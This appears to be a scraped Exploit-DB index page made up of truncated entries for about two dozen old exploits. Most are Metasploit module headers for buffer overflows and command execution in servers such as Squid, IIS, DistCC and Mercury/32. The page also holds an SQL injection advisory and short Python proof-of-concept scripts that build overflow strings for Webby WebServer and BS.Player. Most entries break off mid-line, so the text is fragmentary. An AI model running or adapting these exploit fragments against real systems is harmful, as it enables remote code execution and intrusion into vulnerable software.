| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub12-eshtery-cms-sql-injection-vulnerability/
'''
Abysssec Inc Public Advisory
Title : eshtery CMS Sql Injection Vulnerability
Affected Version : eshtery copyrights 2003-2004
Discovery : www.abysssec.com
Vendor : http://eshtery.she7ata.com/projects/eshtery/
Demo : http://eshtery.she7ata.com/projects/eshtery/
Download Links : http://sourceforge.net/projects/eshtery/
Description :
1) SQL Injection
for successful injection in this cms you have to pass two steps.
Step 1:
Go to this path:
http://Example.com/catlgsearch.aspx
and enter this value
Exploit-DB
Apple QuickTime - '_Marshaled_pUnk' Backdoor Client-Side Arbitrary Code Execution
exploitdb · 2010-08-30 · CVE-2010-1818
---
Original Source: http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1
Victim prerequisites:
* Internet Explorer.
* XP,Vista,W7.
* Apple Quicktime 7.x, 6.x ( 2004 versions are also vulnerable, older versions not checked )
1. Victim is enticed into visiting, by any mean, a specially crafted webpage.
2. Attacker's payload to be executed under the context of the browser.
3. Attacker calls his girlfriend to inform about the successful exploitation, who indeed turns out to be very interested in the issue. She demands more technical details.
4. Attacker wakes up.
Technical details
QTPlugin.ocx implements IPersistPropertyBag2::Read (1000E330) to handle params received from where it
Exploit-DB
Subversion - Date Svnserve (Metasploit)
exploitdb · 2010-08-07 · CVE-2004-0397
---
##
# $Id: svnserve_date.rb 9971 2010-08-07 06:59:16Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/http/client'

class Metasploit3 < Msf::Exploit::Remote
  # (Rank and include lines omitted from this excerpt)

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Subversion Date Svnserve',
      'Description'    => %q{
          This is an exploit for the Subversion date parsing overflow. This
          exploit is for the svnserve daemon (svn:// protocol) and will not work
          for Subversion over webdav (http[s]://). This exploit should never
          crash the daemon, and should be safe to do multi-hits.

          **WARNING** This exploit seems to (not very of
Exploit-DB
IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow (Metasploit)
exploitdb · 2010-07-14 · CVE-2004-0798
---
##
# $Id: ipswitch_wug_maincfgret.rb 9820 2010-07-14 13:59:38Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # (Rank line omitted from this excerpt)
  HttpFingerprint = { :pattern => [ /WhatsUp/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ipswitch WhatsUp Gold 8.03 Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By
          posting a long string for the value of 'instancename' in the _maincfgret.cgi
          script an attacker can
Exploit-DB
Microsoft IIS - ISAPI 'w3who.dll' Query String Overflow (Metasploit)
exploitdb · 2010-07-07 · CVE-2004-1134
---
##
# $Id: w3who_query.rb 9719 2010-07-07 17:38:59Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # (Rank line omitted from this excerpt)
  HttpFingerprint = { :pattern => [ // ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the w3who.dll ISAPI
          application. This vulnerability was discovered by Nicolas
          Gregoire and this code has been successfully tested again
Exploit-DB
TWiki - Search Function Arbitrary Command Execution (Metasploit)
exploitdb · 2010-07-03 · CVE-2004-1037
---
##
# $Id: twiki_search.rb 9671 2010-07-03 06:21:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # (Rank and include lines omitted from this excerpt)

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'TWiki Search Function Arbitrary Command Execution',
      'Description'    => %q{
          This module exploits a vulnerability in the search component of TWiki.
          By passing a 'search' parameter containing shell metacharacters to the
          'WebSearch' script, an attacker can execute arbitrary OS commands.
      },
      'Author'         =>
        [
          # Unknown - original discovery
          'jduck' # metasploit version
        ],
      'Licens
Exploit-DB
Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)
exploitdb · 2010-07-03 · CVE-2004-0206
---
##
# $Id: ms04_031_netdde.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # (Rank and include lines omitted from this excerpt)

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft NetDDE Service Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the NetDDE service, which is the
          precursor to the DCOM interface. This exploit affects only operating systems
          released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim
          that this vulnerability can be exploited without authentication, the N
Exploit-DB
BolinTech DreamFTP Server 1.02 - Format String (Metasploit)
exploitdb · 2010-06-22 · CVE-2004-2074
---
##
# $Id: dreamftp_format.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # (Rank and include lines omitted from this excerpt)

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BolinTech Dream FTP Server 1.02 Format String',
      'Description'    => %q{
          This module exploits a format string overflow in the BolinTech
          Dream FTP Server version 1.02. Based on the exploit by SkyLined.
      },
      'Author'         => [ 'Patrick Webster ' ],
      'Arch'           => [ ARCH_X86 ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9583 $',
      'References'     =>
        [
          [ 'CVE', '2004-2074'],
          [ 'OSVDB',
Exploit-DB
Netcat 1.10 - NT Stack Buffer Overflow (Metasploit)
exploitdb · 2010-06-22 · CVE-2004-1317
---
##
# $Id: netcat110_nt.rb 9587 2010-06-22 23:57:05Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # (Rank and include lines omitted from this excerpt)

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Netcat v1.10 NT Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Netcat v1.10 NT. By sending
          an overly long string we are able to overwrite SEH. The vulnerability
          exists when netcat is used to bind (-e) an executable to a port in doexec.c.
          This module tested successfully using "c:\>nc -L -p 31337 -e ftp".
      },
      'Author'         => 'patrick',
      'Arc
Exploit-DB
Webiz 2004 - Local File Upload
exploitdb·2010-05-29
---
# Exploit Title: (Webiz) local SHELL Upload Vulnerability
# Date: 23-05-2010
# Author: kannibal615
# Software Link: N/A
# Version: 2004
# Tested on: PHP
# CVE : N/A
# Code :
WEBIZ REMOTE SHELL UPLOAD VULNERABILITY
BY
KANNIBAL615
== Found By : kannibal615
== website : www.vbhacker.net/vb
== email : zn[at]live[dot]de
==
== Thanks to : THE PIRATOR
== : Pc-InSeCt / emptyzero
== : DAK / l3G3NDS / m0j4h3d
== : V!Ru$_T4ckJ3n / __MiM0__
== : ruqa / PrideA
Exploit-DB
Webby WebServer - Overflow (SEH) (PoC)
exploitdb·2010-05-25
CVE-2010-2102 Webby WebServer - Overflow (SEH) (PoC)
---
#!/usr/bin/python
##POC details:
##
##SEH overwritten
##
##contact: [email protected]
## http://www.s3cur1ty.de
##App detail:
##
#http://www.shareware.de/webby-webserver/
#Version 1.01
#Author Timo Gaik
#License type Freeware
#Platforms Win XP, Win 98, Win ME
#Last update 19.10.2004
#File size 701 KB
import socket
import sys
import os.path
import time
if len(sys.argv) < 3:
    # usage check: the PoC expects a target host and a port
    print "usage: %s <host> <port>" % sys.argv[0]
    sys.exit(0)
ips = sys.argv[1]
port = int(sys.argv[2])
string = "A"*790
string += "\x90"*4
string += "\x42"*105
method = "GET"
print "starting POC for:", ips
print ""
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    connect=s.connect((ips, port))
except:
    print "no connection possible"
    sys.exit(1)
payload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\x0d\x0a
Exploit-DB
Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2004-0735 Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)
---
##
# $Id: mohaa_getinfo.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Medal Of Honor Allied Assault getinfo Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the getinfo
command of Medal Of Honor Allied Assault.
},
'Author' => [ 'Jacopo Cervini' ],
'License' => BSD_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2004-0735'],
[ 'OSVDB', '8061' ],
[ 'URL',
Exploit-DB
PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2004-0313 PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)
---
##
# $Id: psoproxy91_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'PSO Proxy v0.91 Stack Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
If a client sends an excessively long string the stack is overwritten.
},
'Author' => 'Patrick Webster ',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2004-0313' ],
[ 'OSVDB', '4028' ],
[ 'URL', 'http://www.milw0rm.co
Exploit-DB
MiniShare 1.4.1 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2004-2271 MiniShare 1.4.1 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: minishare_get_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Minishare 1.4.1 Buffer Overflow',
'Description' => %q{
This is a simple buffer overflow for the minishare web
server. This flaw affects all versions prior to 1.4.2. This
is a plain stack buffer overflow that requires a "jmp esp" to reach
the payload, making this difficult to target many platforms
at once. This module has been successfully tested against
1.4.1. Version
Exploit-DB
Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2007-1689 Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: nis2004_get.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX
Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004.
By sending an overly long string to the "Get()" method, an attacker may be
able to execute arbitrary code.
Exploit-DB
Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2004-0363 Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: nis2004_antispam.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Norton AntiSpam 2004. When
sending an overly long string to the LaunchCustomRuleWizard() method
of symspam.dll (2004.1.0.147) an attacker may be able to execute
arbitrary code.
},
'License' => MSF_LICENSE,
'Aut
Exploit-DB
Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2004-1211 Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)
---
##
# $Id: mercury_rename.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow vulnerability in the
Mercury/32 v.4.01a IMAP service.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2004-1211'],
[ 'OSVDB', '12508'],
[ 'BID', '11775'],
[ 'NSS', '15867'],
],
'Pri
Exploit-DB
Squid - NTLM (Authenticated) Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2004-0541 Squid - NTLM (Authenticated) Overflow (Metasploit)
---
##
# $Id: squid_ntlm_authenticate.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Squid NTLM Authenticate Overflow',
'Description' => %q{
This is an exploit for Squid\'s NTLM authenticate overflow
(libntlmssp.c). Due to improper bounds checking in
ntlm_check_auth, it is possible to overflow the 'pass'
variable on the stack with user controlled data of a user
defined length. Props to iDEFENSE for the advisory.
},
'Author' => 'skape',
'Version' => '$
Exploit-DB
Berlios GPSD - Format String (Metasploit)
exploitdb·2010-04-30
CVE-2004-1388 Berlios GPSD - Format String (Metasploit)
---
##
# $Id: gpsd_format_string.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Berlios GPSD Format String Vulnerability',
'Description' => %q{
This module exploits a format string vulnerability in the Berlios GPSD server.
This vulnerability was discovered by Kevin Finisterre.
},
'Author' => [ 'Yann Senotier ' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2004-1388' ],
[ 'OSVDB', '13199' ],
[ 'BID', '12371' ],
[ 'URL'
Exploit-DB
Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)
exploitdb·2010-04-30
CVE-2004-1561 Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)
---
##
# $Id: icecast_header.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Icecast ( %q{
This module exploits a buffer overflow in the header parsing
of icecast, discovered by Luigi Auriemma. Sending 32 HTTP
headers will cause a write one past the end of a pointer
array. On win32 this happens to overwrite the saved
instruction pointer, and on linux (depending on compiler,
etc) this seems to generally overwrite nothing crucial (read
not exploit
Exploit-DB
IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2004-0297 IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow (Metasploit)
---
##
# $Id: imail_thc.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'IMail LDAP Service Buffer Overflow',
'Description' => %q{
This exploits a buffer overflow in the LDAP service that is
part of the IMail product. This module was tested against
version 7.10 and 8.5, both running on Windows 2000.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2004-0297'],
[ 'OSVDB'
Exploit-DB
BS.Player 2.51 - Universal Overflow (SEH)
exploitdb·2010-01-16
CVE-2010-2004 BS.Player 2.51 - Universal Overflow (SEH)
---
# Exploit Title: BS.Player v2.51 Universal SEH Overflow Exploit
# Date: 15/01/2010
# Author: Dz_attacker
# Version: 2.51
# Tested on: Windows xp sp3
# Code :
# Discover : mertsarica
# Exploit : Dz_Attacker ([email protected])
junk = "[Options]\nSkin="
# win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
payload =(
Exploit-DB
BS.Player 2.51 - Overwrite (SEH)
exploitdb·2010-01-15
CVE-2010-2004 BS.Player 2.51 - Overwrite (SEH)
---
# BS.Player v2.51
# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
# SEH Overwrite Vulnerability
# http://www.mertsarica.com
junk = "[Options]\nSkin="
vulnerability = junk + "\x41"*496 + "\x42"*4 + "\x43"*4
try:
    vulnerable = open("vulnerable.bsi",'w')
    vulnerable.write(vulnerability)
    vulnerable.close()
    print "Vulnerable file created!\n"
except:
    print "Error occurred!"
Exploit-DB
MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit)
exploitdb·2005-08-12
CVE-2004-1520 MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit)
---
##
# $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
'Description' => %q{
This module exploits a buffer overflow in the CRAM-MD5
authentication of the MDaemon IMAP service. This
vulnerability was discovered by Muts.
},
'Author' => [ 'anonymous' ],
'License' => BSD_LICENSE,
'Version' => '$Revision: 9583 $',
'References' =>
[
[ 'CVE', '2004-1520'],
[ 'OSVDB', '
Exploit-DB
Veritas NetBackup - Remote Command Execution (Metasploit)
exploitdb·2004-10-21
CVE-2004-1389 Veritas NetBackup - Remote Command Execution (Metasploit)
---
##
# $Id: veritas_netbackup_cmdexec.rb 10617 2010-10-09 06:55:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'VERITAS NetBackup Remote Command Execution',
'Description' => %q{
This module allows arbitrary command execution on an
ephemeral port opened by Veritas NetBackup, whilst an
administrator is authenticated. The port is opened and
allows direct console access as root or SYSTEM from
any source address.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Versi
Exploit-DB
DistCC Daemon - Command Execution (Metasploit)
exploitdb·2002-02-01
CVE-2004-2687 DistCC Daemon - Command Execution (Metasploit)
---
##
# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'DistCC Daemon Command Execution',
'Description' => %q{
This module uses a documented security weakness to execute
arbitrary commands on any system running distccd.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'CVE', '2004-2687'],
[ 'OSVDB', '13378' ],
[ 'URL', 'http://distcc.samba.org/security.html'],
],
'Platform' => ['u
No writeups or analysis indexed.
http://secunia.com/advisories/38221
http://www.exploit-db.com/exploits/11154
http://www.mertsarica.com/?p=511
http://www.mertsarica.com/codes/bsplayer_seh_overwrite.py
http://www.securityfocus.com/bid/37831
http://www.vupen.com/english/advisories/2010/0148
https://exchange.xforce.ibmcloud.com/vulnerabilities/55708
2010-05-20
Published